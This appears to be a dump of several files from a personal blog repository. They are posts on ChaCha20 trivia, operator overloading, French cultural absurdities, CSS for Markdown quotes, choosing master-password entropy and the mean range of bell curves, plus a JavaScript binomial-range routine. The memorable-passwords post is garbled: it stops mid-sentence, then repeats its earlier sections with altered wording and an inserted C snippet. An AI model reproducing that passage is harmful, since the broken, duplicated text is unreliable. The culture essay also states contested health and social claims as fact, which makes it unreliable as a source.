goodbye.\n\n1. ChaCha20 [initializes its state][Salsa20] with the ASCII for “expand 32-byte k”. It’s a wink at the purpose of the cipher: it takes a 256-bit key, and expands it to a large random stream.\n2. It is based on the design of [a joke cipher that plays on a US law][djb export] cataloguing encryption as a munition, unless it is a hash. Its author, Daniel J. Bernstein, built it as a simple construction on top of a carefully-constructed hash. Calling the core construction a hash caused him trouble later as [reviewers misunderstood it][salsa hash].\n3. The initial name of that cipher was Snuffle. (Yes.)\n\n[Salsa20]: https://cr.yp.to/snuffle/salsafamily-20071225.pdf\n[djb export]: https://cr.yp.to/export/1996/0726-bernstein.txt\n[salsa hash]: https://cr.yp.to/snuffle/reoncore-20080224.pdf\n\n[Find comments on Reddit](https://www.reddit.com/r/prng/comments/fpy6pg/a_primer_on_randomness/).\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2020-03-27T15:17:57Z\",\n \"keywords\": \"prng, crypto\" }\n</script>\n"
},
{
"alpha_fraction": 0.7719755172729492,
"alphanum_fraction": 0.7773147821426392,
"avg_line_length": 58.527130126953125,
"blob_id": "625ad268178da74483071b0ab9b6f52c2442da80",
"content_id": "b67a63a8d0c35b354b5cfbd37410424701efac37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7681,
"license_type": "no_license",
"max_line_length": 353,
"num_lines": 129,
"path": "/blog/src/language-contradictions.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Language Contradictions\n\nNobody notices how absurd programming languages are until you try and build a new one.\n\nCat-and-mouse questions spring everywhere. Here's a few.\n\nOverloading\n-----------\n\nBack in the 1960s, overloading meant overhead for compiler writers, so they threw it out of their language. Back then, floating-point implemented in hardware was still a thing! Then came Ada and C++, which featured function overloading. For completeness' sake, C++ added operator overloading. After all, operators behave much like functions, don't they?\n\nDo you want overloading?\n\nThis question is still relevant today. Proof is, the Go language [forbids it](http://golang.org/doc/go_faq.html#overloading). How old is Go? It was unveiled in 2008. Bummer.\n\nThe thing is, overloading takes a lot of language constructs for granted.\nYou cannot have overloading without types and functions.\nThose are pretty common, but that condemns languages such as Lisp, JavaScript, Python and Lua from ever overloading anything.\nRather, since those languages have weak typing, all functions are systematically overloaded to all existing types.\nHowever, if you *do* want the behaviour of your function to match the type of your parameters, you have two choices:\n\n- You can, C-style, create functions with different names. What a wonderful world!\nNow you have two problems. What naming rule to follow?\nLisp has those weird `string-` functions (such as `string-equal`)\nwhich both look ugly and are harder to find, for they stack up real fast.\n- You can construct your only function in a `switch` fashion.\nYou check for the type of the parameter, and you have one code block for each choice.\nOf course, this option is unacceptable.\nWhat if you define a brand new type?\nYou would have to modify the source files of such fundamental functions as `equal`.\nNo, this is bad.\n(Yet such bright examples as [SICP itself](http://mitpress.mit.edu/sicp/full-text/book/book-Z-H-26.html#%_sec_4.1) showcase an `eval` function with a huge type check at its core, hence forbidding the creation of new types.)\n\nAt least, the limited possibilities of C makes this choice simple.\nYou have to create a new name. Yet, you have a single namespace.\nYou are effectively out of luck.\n\nLook at [those pretty algorithms](http://shootout.alioth.debian.org/u64q/program.php?test=pidigits&lang=gcc&id=4), filled with `mpz_add(tmp2, tmp2, numer)` instead of `+` and `mpz_cmp(tmp2, denom)` instead of `<`.\n\nI once read a blog post that Brendan Eich pointed to. The author was very unhappy with this kind of syntax in Java. One of the commenters told the amazing story of some Wall Street code that contained `BigDecimal total = new BigDecimal( subA.doubleValue() + subB.doubleValue() );`. The + in there could have been the doom of mankind.\n\nWhile C had an excuse (it was created at a prehistoric time), Go deserves some spite. They argue that…\n\n> Experience with other languages told us that having a variety of methods with the same \n> name but different signatures was occasionally useful but that it could also be \n> confusing and fragile in practice.\n\nOh, boy. Do they really believe that?\n\nI'll tell you what. This is all nonsense.\nIntegers are a type. Floating-point numbers are a different type.\nYou can use the `+` operator with both.\nAll operators are effectively deeply overloaded, even in C, even in Go.\nIs *that* so confusing? If so, take a page from Caml's book. 
Caml has distinct operators for floating-point arithmetic.\n\n----\n\nJava, on the other hand, argues that overloading is good, because using different names for things that do the exact same thing on slightly different types is silly at best. On the other hand, *operator overloading* is deemed bad.\n\nRight. You can remember that *methods* have multiple meanings, but not *operators*. \nBesides, `x.Add(Number.ONE).Mult(y)` is sooo much prettier.\n\nJava is partially wrong. (I guess I'll surprise some readers with this assertion. What? Java isn't *completely* wrong for once?)\n\nLet me state why Java is wrong first.\n\nOverloading being good has nothing to do with types being very similar (ie, on the same type hierarchy branch).\nOverloading should sometimes be applied to types which are miles away from each other.\nOverloading allows a namespace mechanism. A function named `draw` can either paint a shape, or remove a certain amount from an account.\n\nOn the other hand, Java is right that overloading operators isn't the same.\nUntil now, I've implicitly assumed that operators behave like functions, but unless you are using Lisp, this simply isn't true.\nNonetheless, they could have allowed overloading, with a word of warning etched beneath in the brightest red: BEWARE OF THE PRECEDENCE!\n\nPrecedence\n----------\n\nAll modern programming languages have built-in types.\n\nAll modern programming languages allow users to define their own types.\n\nThere should be nothing special between the former and the latter. Yet, there is.\n\nPython has had this issue for quite some time, wherein builtin types did not behave like user-defined classes.\nYou could not subclass a builtin type, for instance.\nThey strove to [fix this](http://www.python.org/dev/peps/pep-0253/).\nThey were right. Why should the user expect builtins to be more important than the code *they* write?\nWhy should their types be second-class?\n\nJava was thoroughly overwhelmed by this issue. Wait, my mistake: it still is!\nThere are those \"primitive data types\" like `int` and arrays that you cannot subclass. These troublesome builtins were such a thorn in programmers' sides that they wrote [class equivalents](http://download.oracle.com/javase/tutorial/java/data/numberclasses.html) and extraterrestrial things such as `BigDecimal`!\nBut operators don't work on them.\n\nOperators make built-in types forever special.\n\nI understand the purpose of operators.\nThey make maths look like maths.\nOtherwise, they are completely useless.\nBut still, they also make builtins more special than your own code! That is *not nice*!\n\nIn turn, why did maths do this?\nThey had a functional notation that was a perfect fit.\nIt turns out that infix notation is one inch shorter. Yes, one inch is the size of two parentheses and a comma. At least on a blackboard.\n\nThe associativity properties of some operators meant that we could chain operations together without caring about bracketing them.\n\nMathematicians pushed wrist laziness as far as to devise a way to remove even more parentheses. They mixed operations that do not associate with each other, such as addition and multiplication. They invented precedence. May God forgive us.\n\nDoes that mean that arithmetic should forever be special?\nLisp proves that there are other ways.\nYou can make operators behave just like functions.\nYou can refuse precedence.\nYou might have every mathematician throwing rocks at you for the rest of your life, though, when they realize that `1 + 2 * 4` is a syntax error. 
At least it doesn't yield 12.\n\nYou can also have faith in your users. You can expect them to use operators for arithmetic only. You can hope that they won't use `+` for string concatenation.\n\nJava, on the other hand, has no faith in its users. Wise decision.\nBy expecting Java programmers to be dumb, they attracted exactly that portion of the programming world. (Mind you, they attracted wise people, too.)\n\nMy aim in writing this article is to make you aware that your programming tools behave counter-intuitively.\n\nI have yet to see a consistent and productive programming language.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2011-08-30T19:54:00Z\",\n \"keywords\": \"js, go\" }\n</script>\n"
},
{
"alpha_fraction": 0.7805212736129761,
"alphanum_fraction": 0.7849108576774597,
"avg_line_length": 78.23912811279297,
"blob_id": "66ad73cec651a564d5c2aa06a148274f1afd4403",
"content_id": "c332345f14445089344095103c6820067e6ac9e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3646,
"license_type": "no_license",
"max_line_length": 561,
"num_lines": 46,
"path": "/blog/src/outdated-culture.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Outdated Culture\n\nI have been enjoying the bits of the series \"Adam Ruins Everything\" that I could watch online. So far, here is what he has addressed:\n\n- Diamond engagement rings were declining in popularity but the diamond cartel De Beers made an extensive ad campaign to convince everyone that they needed expensive rings for engagements\n- Circumcision has weird cultural origins and no health benefits\n- Purebread dogs are not healthy\n- Tipping is an unethical revenue stream uncorrelated to quality of service\n- Donating shoes to poor countries (thus destroying the local shoemaker's jobs, while missing the point, as they could already buy shoes)\n- Magnetic credit cards' poor security against fraud (compared to [EMV][] in Europe, anyway)\n- TSA security theater (you don't know this about me, but I've never been to the US without finding a card in my luggage saying it had been searched. Last time I went, I waited a month to get my luggage back)\n- Anti-competitive car dealership laws\n- How Jaywalking became a crime when originally, streets were meant to walk on (hint, car manufacturers had lobbies)\n- The error rate of lie detectors and fingerprint comparisons\n- Food coloring\n- Wine tasting error rate\n- Listerine false advertising\n- Gerrymandering in the US\n- The rationality of not talking about salary\n- Disney changed public domain laws to milk their old copyrights\n- Hymens don't break, virginity is a lie\n\n[EMV]: https://en.wikipedia.org/wiki/EMV\n\nThat's already a long list, but the show is fairly young!\n\nA number of the crazy things that Adam debunks are cultural and only appear in the US, such as tipping, jaywalking or magnetic credit cards. (Also, how is your ID a driver's license?) That made me wonder how fast I could come up with other things that are absurd in the French experience.\n\nFrance tends to be considered as rational, but there is still plenty of superstition, xenophobia, nationalism, and of course, political corruption (even though much less extensively than in the US). There's a ton of stupid things like yoghurt being advertised as a medical cure, speed detectors on roads being marked up on cars' GPS trackers to warn drivers (forcing them to be distracted), homeopathy being sold by pharmacies, and the awful impact of christian extremism in schools leading to absurd amounts of teen pregnancies, health illiteracy and misogyny.\n\nI didn't even mention how wine is seen as French, but in the 19th century, an imported American disease [destroyed][Blight] all the French vines and they were all grafted with American ones, so they're not really authentic anymore (well, technically, the American ones were imported from France in the first place, but the DNA got mixed up so much that the struggle for authenticity and labels such as AOC is ridiculous anyway).\n\n[Blight]: https://en.wikipedia.org/wiki/Great_French_Wine_Blight\n\nWhat do I forget? Oh, yes, the twisted French elitism ensures that top schools (which are NOT UNIVERSITIES because Napoléon) and companies accept children of people that went there more readily. Finally, there's a weird and all-too-common sexual mutilation performed on women called \"point du mari\" that reduces the diameter of their vagina, often without their consentment as a surgery after they had a baby.\n\nOn a lighter note, matadors (you know, the performers who turn animal cruelty into entertainment?) 
are still a thing in southern France.\n\nBut hey, at least we don't believe in fan death!\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2015-12-12T20:15:00Z\",\n \"keywords\": \"\" }\n</script>\n"
},
{
"alpha_fraction": 0.5975790619850159,
"alphanum_fraction": 0.625,
"avg_line_length": 36.13761520385742,
"blob_id": "1cf0b32fdb62544f675a7d242366e1e1c1e97b41",
"content_id": "10a2b28c08ff7c31122db88d722869097867784c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4050,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 109,
"path": "/blog/assets/mean-range-of-a-bell-curve-distribution/binomial-mean-range.js",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "// Compute the mean range and its extrema for a Binomial distribution.\n//\n// This code depends on https://github.com/cag/mp-wasm.\n\n// Compute the range of a binomial distribution.\n// In other words, the max and min of the set of likely (≥ `prob`) values\n// of the number of positive events among `events` independent attempts\n// that go positive with probability `posprob`,\n// when that set is constituted of `samples` independently obtained numbers\n// (of positive events among `event` attempts).\nfunction binomialRange(events, posprob, samples, prob = .5, mpf = this.mpf) {\n const n = mpf(events);\n const p = mpf(posprob);\n const g = mpf(prob);\n const pi = mpf.getPi();\n if (p.isNaN() || !p.isFinite()) {\n return { min: 0, max: 0, range: 0, iterations: 0 };\n }\n const targetProb = mpf(1).sub(mpf(1).sub(g)\n .pow(mpf(1).div(mpf(samples))));\n let min, max; // What we are searching for.\n\n // Track lower and upper bounds to the range.\n const mean = n.mul(p), variance = mean.mul(mpf(1).sub(p));\n let lowMin = mpf(0); // Pr(lowMin) <= targetProb.\n let highMin = mean.floor(); // Must always be Pr(highMin) > targetProb.\n let lowMax = mean.ceil(); // Must always be Pr(lowMax) > targetProb.\n let highMax = n; // Pr(highMax) <= targetProb.\n let steps = 0;\n\n let approxMean = mean;\n for (;;) {\n steps++;\n let normal = normalRange(approxMean, variance, samples, prob, mpf);\n let curMax = normal.max.ceil();\n // Compute the actual probability at that estimation.\n let curProb = binomialProb(curMax, n, p, mpf);\n // Update the approximate mean\n // to get the normal curve to track the binomial one.\n approxMean = curMax.sub(mpf.sqrt(\n variance.mul(-2).mul(mpf.log(curProb.mul(\n mpf.sqrt(variance.mul(2).mul(pi)))))));\n // Check that we are not stuck on a value.\n if (curMax.lte(lowMax) || curMax.gte(highMax) || curMax.isNaN()) {\n // Use binary search instead.\n curMax = lowMax.div(2).add(highMax.div(2)).floor();\n curProb = binomialProb(curMax, n, p, mpf);\n }\n // Update the bounds.\n if (curProb.gt(targetProb)) {\n lowMax = curMax;\n } else {\n highMax = curMax;\n }\n if (highMax.sub(lowMax).lte(1)) {\n max = lowMax;\n break;\n }\n }\n\n approxMean = mean;\n for (;;) {\n let normal = normalRange(approxMean, variance, samples, prob, mpf);\n let curMin = normal.min.ceil();\n // Compute the actual probability at that estimation.\n let curProb = binomialProb(curMin, n, p, mpf);\n // Update the approximate mean\n // to get the normal curve to track the binomial one.\n approxMean = curMin.add(mpf.sqrt(\n variance.mul(-2).mul(mpf.log(curProb.mul(\n mpf.sqrt(variance.mul(2).mul(pi)))))));\n // Check that we are not stuck on a value.\n if (curMin.lte(lowMin) || curMin.gte(highMin) || curMin.isNaN()) {\n // Use binary search instead.\n curMin = lowMin.div(2).add(highMin.div(2)).floor();\n curProb = binomialProb(curMin, n, p, mpf);\n }\n // Update the bounds.\n if (curProb.gt(targetProb)) {\n highMin = curMin;\n } else {\n lowMin = curMin;\n }\n if (highMin.sub(lowMin).lte(1)) {\n min = highMin;\n break;\n }\n }\n\n // Binary search: (2^128,2^-128,2^128): 128; (2^256,2^-128,2^256): 256\n // Newton method: (2^128,2^-128,2^128): 128; (2^256,2^-128,2^256): 256\n // Interp search: (2^128,2^-128,2^128): 8; (2^256,2^-128,2^256): 8\n\n return { min, max, range: max.sub(min), iterations: steps };\n}\n\n// Compute the probability mass function of a binomial distribution B(n, p),\n// at the point k.\n// In other words, it is the probability of getting k positives,\n// when running n 
independent trials that go positive with probability p.\nfunction binomialProb(k, n, p, mpf = this.mpf) {\n k = mpf(k); n = mpf(n); p = mpf(p);\n const logFactors = mpf.lngamma(n.add(1))\n .sub(mpf.lngamma(k.add(1)))\n .sub(mpf.lngamma(n.sub(k).add(1)))\n .add(k.mul(mpf.log(p)))\n .add(n.sub(k).mul(mpf.log(mpf(1).sub(p))));\n return mpf.exp(logFactors);\n}\n"
},
{
"alpha_fraction": 0.7051950097084045,
"alphanum_fraction": 0.7548085451126099,
"avg_line_length": 51.48113250732422,
"blob_id": "98095228c65e0dde0ac8421aea430893961b2878",
"content_id": "a411710a691a6610b63d9c69ce9007dd724ea73c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5571,
"license_type": "no_license",
"max_line_length": 353,
"num_lines": 106,
"path": "/blog/src/markdown-quote-styling.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Markdown Quote Styling\n\n\n\nAfter four iterations, I am finally happy with the rendering I have for Markdown quotes.\n\n_(You can see an example of one [in this example page](https://thefiletree.com/demo/markdown.md?plug=markdown). The CSS is [here](https://github.com/espadrine/plugs/blob/master/lib/css/markdown.css). If you don’t like reading, I made a [video](https://youtu.be/DNbhgWHPGbQ).)_\n\n## Plain border\n\nThe most straightforward implementation is as a dumb **border on the left**.\n> .markdown blockquote {\n> margin: 0;\n> padding-left: 1.4rem;\n> border-left: 4px solid #dadada;\n> }\n\nIt swiftly provides a good approximation of what I wanted it to look like.\n\n\nHowever, the edges of that border are very sharp. How should we round them?\n\nA border radius would only work on the left edges, not the right ones. We have to get creative.\n\n## Bitmap border image\n\nCSS provides a **border-image** property. Given an image that roughly pictures a square, it can map the top left part of the image to the top left edge of the border, the middle top part to the middle top border, and so on.\n\nIt is flexible enough that we can cheat: we can set it to map the whole picture to the left part of the border.\n> border-style: solid;\n> border-width: 2px 0 2px 4px;\n> border-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAQAAAAFCAYAAABirU3bAAAAOklEQVQI103IQQ2AMBjF4G+/DPCEjiXYwdnTMEAGB3ZYkx7aluTA5edsSQa2OUYtAXvhWcZd6Hin/QOIPwzOiksIkAAAAABJRU5ErkJggg==) 2 0 2 4;\n\nA disadvantage of that approach is that it forces us to have two pixels of invisible border at the top and at the bottom, corresponding to the two pixels of rounded corner in the image.\n\nThat, in turn, forces the paragraph’s margin inside of the blockquote (instead of collapsing with the previous paragraph’s margin), which requires adding a bit of code:\n> .markdown blockquote :first-child {\n> margin-top: 0;\n> }\n> .markdown blockquote :last-child {\n> margin-bottom: 0;\n> }\n\nThat is not overwhelming.\n\nHowever, now, there is a bit of space at the top and at the bottom of the blockquote, for no good reason.\n\n\n## Gradient border image\n\nInstead of using a bitmap image, we can rely on a **radial gradient** to generate an ellipse. We can use the border-image parameters to cut almost all of the upper part of the ellipse so that it gets mapped to the top left corner of the border, and similarly for the bottom left, leaving a slim band at the center of the ellipse that will get stretched.\n> border-image: radial-gradient(2px 50% ellipse at 2px 50%, #dadada, #dadada 98%, transparent) 45% 0 45% 4;\n\nThe disadvantage of this approach is that the rounded edge is pixelized, not antialiased.\n\n\nBesides, it doesn’t get rid of the top and bottom space.\n\nWe could, however, remove the top and bottom part of the border-image. Then, we would directly see the ellipse on the left.\n> border-image: radial-gradient(2px 50% ellipse at 2px 50%, lightgray, lightgray 98%, transparent) 15% 0 15% 4;\n\nHowever, the border would then look different (and stretched) depending on the height of the blockquote.\n\n\n## Before pseudo-element\n\nOne last hope is to rely on the ::before pseudo-element. We can style it as if it was a block, and make it float on the left.\n> .markdown blockquote::before {\n> content: '';\n> display: block;\n> float: left;\n> width: 4px;\n> height: 4em;\n> margin-right: 1.2rem;\n> background: #dadada;\n> border-radius: 2px;\n> }\n\nHowever, we lose any height information. 
We cannot put a height of 100%, as that is still 0. We have no connection to the blockquote.\n\nBut it turns out we can force one to be created. All we need is a common trick: we force the blockquote (the parent element) to have a relative position, and force the ::before (the child) to have an absolute position.\n> .markdown blockquote::before {\n> content: '';\n> position: absolute;\n> left: 0;\n> width: 4px;\n> height: 100%;\n> background: #dadada;\n> border-radius: 2px / 4px;\n> }\n\nThen, as if by magic, our 100% height matches our intention.\n\n\nAs an aside, I was not completely satisfied by the 2 pixel border-radius, as it still looked a bit sharp. However, a 2px / 4px gave outstanding results.\n\nIn conclusion, with a bit of trickery, we can render markdown as nicely as we want, without changing the HTML produced by standard tools.\n\nHere is the CSS file I now use: [https://github.com/espadrine/plugs/blob/master/lib/css/markdown.css](https://github.com/espadrine/plugs/blob/master/lib/css/markdown.css). A demo of that file is available here: [https://thefiletree.com/demo/markdown.md?plug=markdown](https://thefiletree.com/demo/markdown.md?plug=markdown).\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2016-03-05T17:06:00Z\",\n \"keywords\": \"markdown, css\" }\n</script>\n"
},
{
"alpha_fraction": 0.7649750113487244,
"alphanum_fraction": 0.7847033739089966,
"avg_line_length": 45.32450485229492,
"blob_id": "8bb3c364010a3543a7022d471c7537b4ad7e4b6a",
"content_id": "acebe054d8d7259f9432b2af7b5977b14b31037c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7029,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 151,
"path": "/blog/src/memorable-passwords.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Memorable passwords\n\nWe are slowly getting to a comfortable password situation.\n\nResearch has improved on which passwords are easier to remember.\nCryptographers have [strenghtened the cost][Argon2-KDF] of cracking weak passwords.\nPeople are more aware of the security risks,\nand the usage of password managers grows.\n\nThe consensus on password handling is this:\n\n1. Keep a very strong master password in your head, stored nowhere.\n2. Use it to unlock your password manager.\n3. Use your password manager to store and create very random passwords for individual websites.\n You would never be able to remember them, but you only need to remember the master password.\n Typically, for alphanumerical outputs, you need ⌈128÷log2(26·2+10)⌉ = 22 characters.\n4. The websites, and more importantly, the password manager,\n use a key derivation function such as [Argon2][Argon2-KDF] either on the front-end\n (server relief) or on the backend, and only stores the output.\n It ensures computation is both time-hard and memory-hard, with settings kept up-to-date\n to ensure that each computation takes 0.5 seconds and/or 4 GB of RAM.\n\nBut some details are left unset: exactly how strong should the master password be?\nHow do we even know?\nCan this situation converge to an easier user experience for login on the Web?\n\n## Password hashing\n\nSome accurate statements may be surprising to the general population.\nThis is one:\n\n**Multiple passwords can unlock your account.**\n\nThe reason? Your password is not compared byte-for-byte (thankfully!)\nbut through a hashing method that does not map one-to-one.\n\nIndeed, hashes have fixed sizes (typically 256 bits),\nwhile passwords have arbitrary length.\n\nOverall, this consideration is unimportant,\nbecause virtually no password is strong enough\nto even compete with the collision risk of the hash:\nit is tremendously more likely for a collision to be caused by\nthe generation process, than by the hash,\nwhose collision risk is 2<sup>N÷2</sup>\nwhere N is the size of the hash, typically 256 bits nowadays.\n\nOn top of this, some companies build their login system\nin a way that is more resilient to user error,\nsuch as [having caps lock on][Facebook passwords].\n\nThat too is irrelevant, since the search space is typically only reduced\nby one bit (corresponding to the choice between setting caps lock or not).\n\n## Target strength\n\n[Some suggestions target specific cryptographic algorithms][StackOverflow strength suggestion].\nBut this pushes machine limits into human constraints:\nalgorithms require 128-bit security, not because 127 is not enough,\nbut because it is a power of two that neatly fits with various engineering techniques.\n\nThe real human constraint is your lifetime.\nOnce you are dead, it does not matter too much to your brain whether your secrets are out,\nsince your brain becomes mulch.\n\nThe longest person alive is a French woman that died nearly reaching 123.\nLet’s imagine that health will improve\nsuch that someone will live double that amount, Y = 246 years.\nWhat is the minimum strength needed to ensure they won’t have their secrets cracked alive?\n\nCurrent compute costs hover around €3/month on low-end machines.\nLet’s imagine that it will improve a hundredfold in the coming century.\n\nThe NSA yearly budget is estimated at B = €10 billion.\nCan they hack you before you die?\n\nFirst, under those assumptions,\nassuming the NSA consumes its whole budget cracking you,\nhow many computers will it use to crack you in 
But some details are left unset: exactly how strong should the master password be?\nHow do we even know?\nCan this situation converge to an easier user experience for login on the Web?\n\n## Password hashing\n\nSome accurate statements may be surprising to the general population.\nThis is one:\n\n**Multiple passwords can unlock your account.**\n\nThe reason? Your password is not compared byte-for-byte (thankfully!)\nbut through a hashing method that does not map one-to-one.\n\nIndeed, hashes have fixed sizes (typically 256 bits),\nwhile passwords have arbitrary length.\n\nOverall, this consideration is unimportant,\nbecause virtually no password is strong enough\nto even compete with the collision risk of the hash:\nit is tremendously more likely for a collision to be caused by\nthe generation process, than by the hash,\nwhose collision risk is 2<sup>N÷2</sup>\nwhere N is the size of the hash, typically 256 bits nowadays.\n\nOn top of this, some companies build their login system\nin a way that is more resilient to user error,\nsuch as [having caps lock on][Facebook passwords].\n\nThat too is irrelevant, since the search space is typically only reduced\nby one bit (corresponding to the choice between setting caps lock or not).\n\n## Target strength\n\n[Some suggestions target specific cryptographic algorithms][StackOverflow strength suggestion].\nBut this pushes machine limits into human constraints:\nalgorithms require 128-bit security, not because 127 is not enough,\nbut because it is a power of two that neatly fits with various engineering techniques.\n\nThe real human constraint is your lifetime.\nOnce you are dead, it does not matter too much to your brain whether your secrets are out,\nsince your brain becomes mulch.\n\nThe longest-lived person on record was a French woman who died nearly reaching 123.\nLet’s imagine that health will improve\nsuch that someone will live double that amount, Y = 246 years.\nWhat is the minimum strength needed to ensure they won’t have their secrets cracked alive?\n\nCurrent compute costs hover around €3/month on low-end machines.\nLet’s imagine that it will improve a hundredfold in the coming century.\n\nThe NSA yearly budget is estimated at B = €10 billion.\nCan they hack you before you die?\n\nFirst, under those assumptions,\nassuming the NSA consumes its whole budget cracking you,\nhow many computers will it use to crack you in parallel?\nThe result is P = B ÷ 12 ÷ 0.03 = 28 billion servers.\n\nIf your password has an N-bit entropy,\nit will take 2<sup>N-1</sup>·0.005÷P÷3600÷24÷365 years on average,\nassuming the NSA is brute-forcing with CPUs that can do one attempt every 5 milliseconds\n(a hundredth of the [Argon2][Argon2-KDF] recommended setting,\nto account for the possibility that the NSA has machines a hundred times more powerful\nthan the rest of us, which is both unlikely, and would not cost what we estimated).\n\nAs a result, our formula for picking strength is\nN = log2(B÷12÷0.03 · Y·365·24·3600÷0.005) + 1 = 77 bits of security.\n\nNote that we can assume that a good KDF is used,\nsince we are only worried about password strength for the password manager,\nwhich should be pretty good at choosing the right design.\nThe password manager will generate all normal passwords above 128 bits of security anyway.\n(Except for those pesky websites that inexplicably have an upper password length limit.\nBut those are beyond saving.)\n\nI parameterized some values so that you can plug in your own situation.\nFor instance, if you make a password for your startup\nthat you believe will beat the odds of an average 5-year lifespan,\nand become a behemoth a thousand years into the future, you can set Y = 1000\nand get a very slight increase to 79 bits.\n\nIf you instead believe that your adversary will spend a trillion euros every year,\nyou can bump things up to 83 bits of security.\n\n## Master password generation\n\nHow do you convert a number of bits of security into a master password?\nWell, those bits represent the amount of entropy of the random generator.\nOr in other words, the quantity of uncertainty of the password-making process.\n\nEach bit represents one truly random choice between two options.\nIf you have four options, it is as if you made two choices, and so on.\n\nA good way to make memorable master passwords is to pick words from large dictionaries:\npicking from a long list adds a lot of entropy (it packs many binary choices),\nwhile each word stays very distinctively evocative.\n\nHowever, each word is independent, and therefore,\nmaking stories in your head that combine those words gets harder the more words there are.\nSo we randomize the word separators as symbols,\nwhich both adds entropy (so that we can have fewer words),\nand is not too hard to remember. Besides, breaking words apart ensures that\nwe don’t lose entropy by ending up with two words that, concatenated,\nare actually a single word from the same dictionary.\n\n
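To sanity-check how many words the 77-bit target implies, a sketch (the 7776-word dictionary and the 16-symbol separator set are assumptions for illustration):\n\n```\n#include <math.h>\n#include <stdio.h>\n\nint main(void) {\n  const double target = 77;   // bits of security, from the derivation above\n  const double words = 7776;  // assumed dictionary size, ~12.9 bits per word\n  const double symbols = 16;  // assumed separator set, 4 bits per separator\n  double bits = 0;\n  int count = 0;\n  while (bits < target) {\n    bits += log2(words);                       // one random word\n    if (bits < target) bits += log2(symbols);  // one random separator\n    count++;\n  }\n  printf(\"%d words reach %.1f bits\\n\", count, bits); // prints: 5 words\n}\n```\n\n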
I implemented these principles on [this passphrase generation page][passphrase].\n\n## Thank you, Next\n\nI feel strongly that passwords are passé.\nI would love to talk about my hopes for the future of Web authentication.\n\n[Reddit comments here][].\n[HN comments here][].\n\n[Argon2-KDF]: https://password-hashing.net/argon2-specs.pdf\n[Facebook passwords]: https://www.zdnet.com/article/facebook-passwords-are-not-case-sensitive-update\n[StackOverflow strength suggestion]: https://crypto.stackexchange.com/questions/60815/recommended-minimum-entropy-for-online-passwords-in-2018\n[passphrase]: https://espadrine.github.io/passphrase/\n[Reddit comments here]: https://www.reddit.com/r/programming/comments/hf63bp/generate_cryptographically_secure_passphrases_at/\n[HN comments here]: https://news.ycombinator.com/item?id=23632533\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2020-06-24T19:50:27Z\",\n \"keywords\": \"crypto\" }\n</script>\n"
},
{
"alpha_fraction": 0.6915057897567749,
"alphanum_fraction": 0.7219858765602112,
"avg_line_length": 37.26654815673828,
"blob_id": "a4da409404e2cbd0111431380ec087b4c8488ecc",
"content_id": "7b168d9dd19060fcd546c0d910c11cb82b289962",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21416,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 559,
"path": "/blog/src/mean-range-of-bell-curve-distributions.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Mean Range of Bell Curve Distributions\n\n**Abstract:**\nWhen sampling several data points from a known statistical distribution,\na valuable indication of the spread is the range of the set of values obtained.\nSince the sampling is probabilistic,\nthe best estimate we can hope for is the expected value of the range.\nThat mean range,\nalong with the expected maximum and minimum values of the sampling set,\nare traditionally difficult to compute with existing means.\nWe present a method to perform that computation,\nand its implications on the correct computation of the balls-into-bins problem.\n\n<style>\n.ballsIntoBins {\n width: 90%;\n margin: auto;\n padding: .6em 2em;\n border: 1px solid lightgray;\n border-radius: 50px;\n background-color: #fafaff;\n}\n.ballsIntoBins p {\n text-align: center;\n}\n.ballsIntoBins input {\n width: 7ex;\n}\noutput { word-break: break-all; }\n</style>\n<div class=ballsIntoBins>\n <p> Randomly placing this number of balls:\n <input id=ballsInput value='2^128'>\n = <output id=ballsOutput>340282366920938463463374607431768211456</output>,\n <br> in this number of bins:\n <input id=binsInput value='2^128'>\n = <output id=binsOutput>340282366920938463463374607431768211456</output>,\n <br> causes the least filled bin to contain\n <output id=minOutput>0</output>\n balls, whilst the most filled bin contains\n <output id=maxOutput>33</output>\n balls, which is\n <output id=rangeOutput>33</output>\n more.\n <p id=ballsErrors>\n</div>\n\n**Introduction:**\nCurrently, there does not seem to be any exact, computable formula\nfor the expected range of obtaining samples from a distribution.\nThe [best known formula][Har54] is:\n\n```latex\nn \\int_{0}^{1} x(G)[G^{n-1} - (1-G)^{n-1}] \\, \\mathrm{d}G\n```\n\nwhich requires integrating with respect to the the inversed distribution.\n\nIn the case of discrete random variables, such as the Binomial distribution,\n[a solution can be computed in a finite number of steps][Abd54]:\n$`\\sum_{x=1}^{N-t} [G(x+t)-G(x-1)]^n - [G(x+t)-G(x)]^n - [G(x+t-1)-G(x-1)]^n + [G(x+t-1)-G(x)]^n, t > 0`.\n\nHowever, the number of iterations scales with $`n`,\nand I wish to compute exact results for values of $`n`\nthat cannot be iterated through within the timespan of the 